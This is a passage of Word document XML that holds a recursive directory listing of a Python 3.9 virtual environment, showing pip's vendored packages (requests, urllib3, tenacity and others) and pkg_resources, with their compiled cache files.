    <w:p w14:paraId="5418AA7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__main__.cpython-39.pyc  api.cpython-39.pyc      unix.cpython-39.pyc   windows.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F89FD" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736DA0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./venv/lib/python3.9/site-packages/pip/_vendor/progress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1F73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bar.py  colors.py  counter.py  spinner.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13954FB3" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="621F36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./venv/lib/python3.9/site-packages/pip/_vendor/progress/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6272411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bar.cpython-39.pyc  colors.cpython-39.pyc  counter.cpython-39.pyc  spinner.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543826DC" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0937AA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./venv/lib/python3.9/site-packages/pip/_vendor/requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790FB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_internal_utils.py  auth.py    cookies.py     hooks.py     sessions.py      utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFB07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adapters.py         certs.py   exceptions.py  models.py    status_codes.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F212F3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__version__.py  api.py              compat.py  help.py        packages.py  structures.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571CA84B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01712D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./venv/lib/python3.9/site-packages/pip/_vendor/requests/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1A83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auth.cpython-39.pyc        help.cpython-39.pyc      status_codes.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF60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__version__.cpython-39.pyc      certs.cpython-39.pyc       hooks.cpython-39.pyc     structures.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542548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_internal_utils.cpython-39.pyc  compat.cpython-39.pyc      models.cpython-39.pyc    utils.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A367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adapters.cpython-39.pyc         cookies.cpython-39.pyc     packages.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8FCD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api.cpython-39.pyc              exceptions.cpython-39.pyc  sessions.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C90DD0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5923BD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./venv/lib/python3.9/site-packages/pip/_vendor/resolvelib:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29C8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compat  providers.py  reporters.py  resolvers.py  structs.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03200F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF1A92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./venv/lib/python3.9/site-packages/pip/_vendor/resolvelib/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4195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providers.cpython-39.pyc  reporters.cpython-39.pyc  resolvers.cpython-39.pyc  structs.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DBB7B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258E4E7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./venv/lib/python3.9/site-packages/pip/_vendor/resolvelib/compat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6479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collections_abc.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0A5A1" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FEDF4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./venv/lib/python3.9/site-packages/pip/_vendor/resolvelib/compat/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7FC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collections_abc.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BBD6E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233F039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./venv/lib/python3.9/site-packages/pip/_vendor/tenacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379C7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_asyncio.py  after.py   before_sleep.py  retry.py  tornadoweb.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F56D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_utils.py    before.py  nap.py           stop.py   wait.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F836A95" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9CA6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./venv/lib/python3.9/site-packages/pip/_vendor/tenacity/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B31EC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after.cpython-39.pyc         nap.cpython-39.pyc    tornadoweb.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB184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_asyncio.cpython-39.pyc  before.cpython-39.pyc        retry.cpython-39.pyc  wait.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2792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_utils.cpython-39.pyc    before_sleep.cpython-39.pyc  stop.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F246E69" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AC95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./venv/lib/python3.9/site-packages/pip/_vendor/tomli:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4A4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_parser.py  _re.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480625C" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4A405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./venv/lib/python3.9/site-packages/pip/_vendor/tomli/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792DF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_parser.cpython-39.pyc  _re.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D1300" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEE9E3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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938C5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_collections.py  connection.py      contrib        fields.py    packages        request.py   util</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE973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_version.py      connectionpool.py  exceptions.py  filepost.py  poolmanager.py  response.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB3A1F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F192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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97A1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__init__.cpython-39.pyc      connection.cpython-39.pyc      fields.cpython-39.pyc       request.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012C5E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_collections.cpython-39.pyc  connectionpool.cpython-39.pyc  filepost.cpython-39.pyc     response.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E45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_version.cpython-39.pyc      exceptions.cpython-39.pyc      poolmanager.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFBD0A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640422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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/contrib:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99D7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_appengine_environ.py  appengine.py  pyopenssl.py        socks.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E0F6D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_securetransport       ntlmpool.py   securetransport.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AB555" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBB30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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/contrib/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D22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appengine.cpython-39.pyc  pyopenssl.cpython-39.pyc        socks.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036971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_appengine_environ.cpython-39.pyc  ntlmpool.cpython-39.pyc   securetransport.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594F18F5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7D53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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/contrib/_securetransport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5A5E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bindings.py  low_level.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA890E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2698946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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/contrib/_securetransport/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46824E1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bindings.cpython-39.pyc  low_level.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF9DEC9" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE47B1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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B540D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backports  six.py  ssl_match_hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E65D6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE5A52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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/packages/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC831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six.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093CA667" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C8699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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/packages/backports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188FF6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makefile.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB225A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4921D4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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/packages/backports/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D977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makefile.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2475E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E38DA2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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/packages/ssl_match_hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661617D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_implementation.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E18FA" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643128A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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/packages/ssl_match_hostname/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF175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_implementation.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66487D9E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0608094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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/util:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D583AA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connection.py  queue.py    response.py  ssl_.py          timeout.py  wait.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE5D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proxy.py       request.py  retry.py     ssltransport.py  url.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC3897" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4273D89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./venv/lib/python3.9/site-packages/pip/_vendor/urllib3/util/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7149DE1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queue.cpython-39.pyc     retry.cpython-39.pyc         timeout.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB11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connection.cpython-39.pyc  request.cpython-39.pyc   ssl_.cpython-39.pyc          url.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E29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proxy.cpython-39.pyc       response.cpython-39.pyc  ssltransport.cpython-39.pyc  wait.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B662B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDB616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./venv/lib/python3.9/site-packages/pip/_vendor/webencodings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3487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labels.py  mklabels.py  tests.py  x_user_defined.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BC0F0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453560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./venv/lib/python3.9/site-packages/pip/_vendor/webencodings/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFFF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labels.cpython-39.pyc  mklabels.cpython-39.pyc  tests.cpython-39.pyc  x_user_defined.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC2353" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D4352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./venv/lib/python3.9/site-packages/pip-21.3.1.dist-info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0788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INSTALLER  LICENSE.txt  METADATA  RECORD  REQUESTED  WHEEL  entry_points.txt  top_level.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F99E14" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473227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./venv/lib/python3.9/site-packages/pkg_resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25291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_vendor  extern  tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA62668" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371C2F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./venv/lib/python3.9/site-packages/pkg_resources/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5586E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__init__.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F242461" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4894716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./venv/lib/python3.9/site-packages/pkg_resources/_vendor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE95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appdirs.py  packaging  pyparsing.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D545FE2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EF5F9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./venv/lib/python3.9/site-packages/pkg_resources/_vendor/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232B9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appdirs.cpython-39.pyc  pyparsing.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF25DCD" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530543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./venv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C061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__about__.py  __pycache__    _musllinux.py   markers.py       specifiers.py  utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445240C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_manylinux.py  _structures.py  requirements.py  tags.py        version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CC4E7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6A8F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./venv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1EB3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__about__.cpython-39.pyc   _musllinux.cpython-39.pyc   requirements.cpython-39.pyc  utils.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CFC2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_structures.cpython-39.pyc  specifiers.cpython-39.pyc    version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D739A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_manylinux.cpython-39.pyc  markers.cpython-39.pyc      tags.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CA0D0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8236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./venv/lib/python3.9/site-packages/pkg_resources/extern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E34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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9DAED" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C808C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./venv/lib/python3.9/site-packages/pkg_resources/extern/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA041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w:t>
      </w:r>
    </w:p>
